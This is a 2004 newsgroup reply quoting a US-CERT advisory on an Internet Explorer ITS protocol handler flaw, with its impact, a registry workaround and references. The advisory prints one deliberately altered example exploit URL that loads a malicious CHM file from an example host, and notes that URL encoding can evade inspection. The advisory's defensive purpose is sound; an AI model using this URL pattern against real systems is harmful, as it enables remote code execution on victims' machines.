Re: US_CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler (transcribed)

From: David H. Lipman (DLipman~nospam~_at_Verizon.Net)
Date: 04/09/04 

Date: Thu, 8 Apr 2004 20:18:32 -0400

Bill:

I posted the CIAC version Today in Verizon's hierarchy.

BTW: Did/Do you "really" know what Raoul and I were discussing ? If you do, drop me an
email....

Dave

"Bill Sanderson" <Bill_Sanderson@msn.com.plugh.org> wrote in message
news:%23XQEJYcHEHA.3200@TK2MSFTNGP10.phx.gbl...
| Folks, this won't verify, nor does what I take to be the original received
| by email--check with US-CERT directly for authoritative information.
|
| You may have noticed an increased level of posting of bugbear variants and
| bloodhound.exploit.6 recently.
|
| This is unpatched in IE, active in the wild, and being reported by our
| friends and neighbors, and this alert gives a registry key to work around
| until a patch is available.
|
|
|
| -----BEGIN PGP SIGNED MESSAGE-----
| Hash: SHA1
|
| Vulnerability in Internet Explorer ITS Protocol Handler
|
| Original release date: April 8, 2004
| Last revised: --
| Source: US-CERT
|
| Systems Affected
|
| * Microsoft Windows systems running Internet Explorer
|
| Overview
|
| A cross-domain scripting vulnerability in Microsoft Internet Explorer
| (IE) could allow an attacker to execute arbitrary code with the
| privileges of the user running IE. The attacker could also read and
| manipulate data on web sites in other domains or zones.
|
| I. Description
|
| There is a cross-domain scripting vulnerability in the way ITS
| protocol handlers determine the security domain of an HTML component
| stored in a Compiled HTML Help (CHM) file. The HTML Help system
| "...uses the underlying components of Microsoft Internet Explorer to
| display help content. It supports HTML, ActiveX, Java, [and] scripting
| languages (JScript, and Microsoft Visual Basic Scripting Edition)."
| CHM files use the InfoTech Storage (ITS) format to store components
| such as HTML files, graphic files, and ActiveX objects. IE provides
| several protocol handlers that can access ITS files and individual CHM
| components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
| the ability to access parts of MIME Encapsulation of Aggregate HTML
| Documents (MHTML) using the mhtml: protocol handler.
|
| When IE references an inaccessible or non-existent MHTML file using
| the ITS and mhtml: protocols, the ITS protocol handlers can access a
| CHM file from an alternate source. IE incorrectly treats the CHM file
| as if it were in the same domain as the unavailable MHTML file. Using
| a specially crafted URL, an attacker can cause arbitrary script in a
| CHM file to be executed in a different domain, violating the
| cross-domain security model.
|
| Any programs that use the WebBrowser ActiveX control or the IE HTML
| rendering engine (MSHTML) may be affected by this vulnerability.
| Internet Explorer, Outlook, and Outlook Express are all examples of
| such programs. Any programs, including other web browsers, that use
| the IE protocol handlers (URL monikers) could function as attack
| vectors. Also, due to the way that IE determines MIME types, HTML and
| CHM files may not have the expected file name extensions (.htm/.html
| and .chm respectively).
|
| NOTE: Using an alternate web browser may not mitigate this
| vulnerability. It may be possible for a web browser other than IE on a
| Windows system to invoke IE to handle ITS protocol URLs.
|
| US-CERT is tracking this issue as VU#323070. This reference number
| corresponds to CVE candidate CAN-2004-0380.
|
| II. Impact
|
| By convincing a victim to view an HTML document such as a web page or
| HTML email message, an attacker could execute script in a different
| security domain than the one containing the attacker's document. By
| causing script to be run in the Local Machine Zone, the attacker could
| execute arbitrary code with the privileges of the user running IE. The
| attacker could also read or modify data in other web sites (including
| reading cookies or content and modifying or creating content).
|
| Publicly available exploit code exists for this vulnerability. US-CERT
| has monitored incident reports that indicate that this vulnerability
| is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
| BloodHound.Exploit.6 are some example of malicious code that exploit
| this vulnerability. It is important to note that any arbitrary
| executable payload could be delivered via this vulnerability, and
| different anti-virus vendors may identify malicious code with
| different names.
|
| A malicious web site or email message may contain HTML similar to the
| following:
|
| ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl
| oit_chm::exploit_html
|
| (This URL is intentionally modified to avoid detection by
| anti-virus software.)
|
| In this example, HTML and script in exploit.html will be executed in
| the security context of the Local Machine Zone. It is common practice
| for exploit.html to either contain or download an executable payload
| such as a backdoor, trojan horse, virus, bot, or other malicious code.
|
| Note that it is possible to encode a URL in an attempt to bypass HTTP
| content inspection or anti-virus software.
|
| III. Solution
|
| Currently, there is no complete solution for this vulnerability. Until
| a patch is available, consider the workarounds listed below.
| Disable ITS protocol handlers
|
| Disabling ITS protocol handlers appears to prevent exploitation of
| this vulnerability. Delete or rename the following registry keys:
|
| HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it
| ss,its,mk}
|
| Disabling these protocol handlers will significantly reduce the
| functionality of the Windows Help system and may have other unintended
| consequences. Plan to undo these changes after patches have been
| tested and installed. Follow good Internet security practices
|
| These recommended security practices will help to reduce exposure to
| attacks and mitigate the impact of cross-domain vulnerabilities.
|
| * Disable Active scripting and ActiveX controls
|
| NOTE: Disabling Active scripting and ActiveX controls will not
| prevent the exploitation of this vulnerability.
|
| Disabling Active scripting and ActiveX controls in the Internet
| and Local Machine Zones may stop certain types of attacks and will
| prevent exploitation of different cross-domain vulnerabilities.
|
| Disable Active scripting and ActiveX controls in any zones used to
| read HTML email.
|
| Disabling Active scripting and ActiveX controls in the Local
| Machine Zone will prevent malicious code that requires Active
| scripting and ActiveX controls from running. Changing these
| settings may reduce the functionality of scripts, applets, Windows
| components, or other applications. See Microsoft Knowledge Base
| Article 833633 for detailed information about security settings
| for the Local Machine Zone. Note that Service Pack 2 for Windows
| XP includes these changes.
|
| * Do not follow unsolicited links
|
| Do not click on unsolicited URLs received in email, instant
| messages, web forums, or Internet relay chat (IRC) channels.
|
| * Maintain updated anti-virus software
|
| Anti-virus software with updated virus definitions may identify
| and prevent some exploit attempts. Variations of exploits or
| attack vectors may not be detected. Do not rely solely on
| anti-virus software to defend against this vulnerability. More
| information about viruses and anti-virus vendors is available on
| the US-CERT Computer Virus Resources page.
|
| Appendix B. References
|
| * Vulnerability Note VU#323070 -
| <http://www.kb.cert.org/vuls/id/323070>
|
| * US-CERT Computer Virus Resources -
| <http://www.us-cert.gov/other_sources/viruses.html>
|
| * CVE CAN-2004-0380 -
| <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
|
| * Introduction to URL Security Zones -
| <http://msdn.microsoft.com/workshop/security/szone/overview/overvi
| ew.asp>
|
| * About Cross-Frame Scripting and Security -
| <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec
| urity.asp>
|
| * MIME Type Determination in Internet Explorer -
| <http://msdn.microsoft.com/workshop/networking/moniker/overview/ap
| pendix_a.asp>
|
| * URL Monikers -
| <http://msdn.microsoft.com/workshop/networking/moniker/monikers.as
| p>
|
| * Asynchronous Pluggable Protocols -
| <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable
| .asp>
|
| * Microsoft HTML Help 1.4 SDK -
| <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta
| rt.asp>
|
| * Microsoft Knowledge Base Article 182569 -
| <http://support.microsoft.com/default.aspx?scid=182569>
|
| * Microsoft Knowledge Base Article 174360 -
| <http://support.microsoft.com/default.aspx?scid=174360>
|
| * Microsoft Knowledge Base Article 833633 -
| <http://support.microsoft.com/default.aspx?scid=833633>
|
| * Windows XP Service Pack 2 Technical Preview -
| <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.
| mspx >
|
| * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
| _________________________________________________________________
|
| This vulnerability was reported by Thor Larholm.
| _________________________________________________________________
|
| Feedback can be directed to the author: Art Manion.
| _________________________________________________________________
|
| Copyright 2004 Carnegie Mellon University.
|
| Terms of use:
|
| <http://www.us-cert.gov/legal.html>
|
| Revision History
|
| April 8, 2004: Initial release
| -----BEGIN PGP SIGNATURE-----
| Version: GnuPG v1.2.1 (GNU/Linux)
|
| iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
| sWme3VvhRbvk9KjNUNyTsbY=
| =kL0G
| -----END PGP SIGNATURE-----
|
|
|

Relevant Pages